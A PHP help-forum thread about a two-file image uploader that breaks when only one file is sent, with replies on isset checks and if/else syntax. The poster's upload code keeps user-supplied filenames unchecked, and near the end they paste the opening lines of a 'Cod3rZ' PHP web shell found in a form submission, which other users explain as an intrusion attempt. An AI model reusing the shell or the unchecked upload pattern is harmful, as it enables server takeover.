Jump to content

Recommended Posts

Hi

 

I have a problem with my uploader, the trouble is I want the user to have the option to either upload 1 or 2 files, the trouble is if the user only uploads one image it brings this echo into play

 

echo "Sorry, there was a problem uploading your file.";

 

It works fine if they use both uploaders.

 

There is a couple of questions, would you take the uploader out and create a link to a seperate php form to upload, or is there a simple fix for this.

I will not include all the code just the uploader code

 

$target = "image/";

$target = $target . basename( $_FILES['upload']['name']);

$target2 = "image/";

$target2= $target2 . basename( $_FILES['upload1']['name']);

 

 

if(move_uploaded_file($_FILES['upload']['tmp_name'], $target) && move_uploaded_file($_FILES['upload1']['tmp_name'], $target2))

{

echo "The file ". basename( $_FILES['upload']['name']);

echo "and " . basename( $_FILES['upload1']['name'])." have been uploaded, and your information has been added to the directory";

 

Could you also let me know if the echo's are ok in the above code

 

Thanks in advance

 

 

Hi

 

I have tried the code in a few places, but as a noob guesstimate I thought these looked the most likely

 

<?php

$target = "image/";

$target = $target . basename( $_FILES['upload']['name']);

if(isset($_FILES['upload1'])) {

$target2 = "image/";

$target2= $target2 . basename( $_FILES['upload1']['name']);

}

$name=$_POST['name'];

$address=$_POST['address'];

$address1=$_POST['address1'];

 

I also tried it here

 

$mobile=$_POST['mobile'];

$email=$_POST['email'];

$upload=($_FILES['upload']['name']);

if(isset($_FILES['upload1'])) {

$upload1=($_FILES['upload1']['name']);

}

$bio=$_POST['bio'];

 

 

You need it everywhere you access that $variable. Just from your first post I can see at least one other place you need it

 

if(move_uploaded_file($_FILES['upload']['tmp_name'], $target) && move_uploaded_file($_FILES['upload1']['tmp_name'], $target2))

Just to make sure,

 

When I am placing this in with the variable I take it I use the {}

 

ie

if(isset($_FILES['upload1'])) {

$target2 = "image/";

$target2= $target2 . basename( $_FILES['upload1']['name']);

}

 

if(isset($_FILES['upload1'])) {

$upload1=($_FILES['upload1']['name']);

}

 

Is this the way if the line already begins with "if"

 

ie

if(isset($_FILES['upload1']))

if(move_uploaded_file($_FILES['upload']['tmp_name'], $target) && move_uploaded_file($_FILES['upload1']['tmp_name'], $target2))

 

its this line that is confussing me the most. When I play around with it it starts throwing up errors

 

Oh I take it I leave this one alone and DO NOT insert the

if(isset($_FILES['upload1'])) into this line

mysql_real_escape_string($upload1),

 

thanks again

Yes as it's a block on only want to happen if it's true, then you have to surrounded it in the squiggly brackets to make it a code block.

 

if you do...

 

if(isset($_FILES['upload1'])) {
   if(move_uploaded_file($_FILES['upload']['tmp_name'], $target) && move_uploaded_file($_FILES['upload1']['tmp_name'], $target2)) {
  }
}

 

Then neither file will get moved if upload1 doesn't exist.

 

With regards to inserting it into the database you will need to set up some kind of system so that if the file doesn't exist your query will still work only insert a blank string rather than the filename.

 

Forgive me if Im totally wrong, but I am assuming that this statement you  put up

 

if(isset($_FILES['upload1'])) {

  if(move_uploaded_file($_FILES['upload']['tmp_name'], $target) && move_uploaded_file($_FILES['upload1']['tmp_name'], $target2)) {

  }

}

 

is asking for both files to be put into the folder on the server, so I am guessing it is looking for 2 files to put on the server, what I am trying to get at is the &&  am  i right in that this means both are true (meaning the user has attached the two files)if not throw an error

 

 

By the way if I use this code I am getting an error at line 43

Parse error: syntax error, unexpected T_ELSE in /customers/derbyartists.co.uk/derbyartists.co.uk/httpd.www/php/signup1.php on line 43

 

line 43:-

else {

echo "Sorry, there was a problem uploading your file.";

}

 

?>

 

if(isset($_FILES['upload1'])) {
   if(move_uploaded_file($_FILES['upload']['tmp_name'], $target) && move_uploaded_file($_FILES['upload1']['tmp_name'], $target2)) {
  }
}

 

Was an example of what was wrong, but yes that inner iff statement says if 'upload' successfully moved and 'upload1' successfully moved.

 

else {
echo "Sorry, there was a problem uploading your file.";
} 

 

The error message tells you the problem unexpected ELSE, basically the only valid place for the ELSE statement is...

 

if($something) {
   // do summit
} HERE

 

Before somebody points out, I don't mean exacly there, it can be on the line below, the point is there can't be anything else between the closing bracket of an if statment and the word else.

 

 

Well I see where you are coming from now people, I think with this I am going to go back to the drawing board and start again....I fully understand why they call php the voodoo language.

 

I have managed to get so far and then the more tutorials I look at the more complex it becomes.

 

Yeah Ok I have managed to get two files to upload to my server "which personally I am happy with"  but a message of advice  from a noob, to a noob, if you are trying to upload multiple files.

 

Take on board you need to include script to help:-

 

1-To stop two file names the same being uploaded

2-Security for the databse and your server

3-The user may only want to upload 1 image, so you have to tell the php file and sql about the fact.

4-Take into consideration symbols in the users file names.

 

There maybe many more considerations but these are the main ones I have picked up on.

 

I now hang my head in shame, as you have all beat me with a stick, here is me thinking it be simple as I cracked two file uploads to mail, so how hard can be getting them to an sql and send the user an email repsonse...Basic........VERY WRONG.

Like Cags and Tim etc have said, go back to the very basics starting with

 

<?php

 

Once you understand the basic building blocks, what your currently attempting is not considered anything too complicated. But the first thing you need to learn is the building blocks. I only picked up PHP about 4 months ago, but I have had experience in plenty of other programming languages (Java, C, VB6, VB .NET, C#) to a large degree once you know one, picking up another is fairly pain free, you just have to learn the intricacies of the particular syntax. I taught myself with help from http://www.youtube.com/phpacademy, you may pick up a few minor bad habits from the tutorials, but it will certainly help you get a grounding. Once you have been through the PHP Basics playlist, the advice given by people on forums such as this should start to make a whole lot more sense.

The best free application I've personally used is Notepad++, the ability to code highlight and also show matching brackets (ie. if you click on an opening bracket it highlights the corresponding closing bracket) are invaluable.

Last thing cags, I have just recieved an email because I m still using form to mail and testing the database on a different server, 3 emails in total the first read something like this, not going to put all the code up just the start

 

<?php

# Cod3rZ Shell 5.2

# c0ded by Cod3rZ

# http://cod3rz.helloweb.eu

# http://devilsnight.altervista.org

# 07/08/08

# Cuz We Back Rude This Time

 

# Thanks to nexen

 

error_reporting(0);

 

  $version = '5.2';

  $info = $_SERVER['SERVER_SOFTWARE'];

  $page = $_SERVER['SCRIPT_NAME'];

  $site = getenv("HTTP_HOST");

  $uname = php_uname();

  $smod = ini_get('safe_mode');

  $uid = getmyuid();

  $gid = getmygid();

  $dir = realpath($_POST['dir']);

  $mkdir = $_POST['makedir'];

  $mydir = $_POST['deletedir'];

  $cmd = $_GET['cmd'];

  $host = $_POST['host'];

  $proto = $_POST['protocol'];

  $delete = $_POST['delete'];

  $phpeval = $_POST['php_eval'];

  $db = $_POST['db'];

  $query = $_POST['query'];

  $user = $_POST['user'];

  $pass = $_POST['passd'];

  $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");

  $quotes = get_magic_quotes_gpc();

if ($quotes == "1" or $quotes == "on")

  {

 

Is someone trying to get in

Depends on the circumstance. Theoretically if they can trick your system into uploading a file with that content on to your server, they could then open that file and cause all sorts of havoc. Judging by the part you posted, that script, if ran on your server would give somebody access to knowing what various settings are on your server (which would make hacking it easier) it also looks like it would allow them to delete various files and folders.

 

The downside of providing any URL's on a site such as this. People can view your skill level, they know where your site is, and in many situations they know what your code is. This makes it countless times easier to hack your site.

It would also depend on your server setup, whether your are filtering for file type, how you rename the file when you move it. If for example when the user is uploading a file you have no checks to see what type it is and when you move it you keep the same file extention then all the user has to do is upload any file they want and they essentially have faily open access to your site. If you check the filetype or change the file extention this will become slightly more difficult as most servers by default will only parse PHP information which is store in a .php file (in some cases .html) and are highly unlikely to cause much trouble if the file extention is .jpg/.gif etc.

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.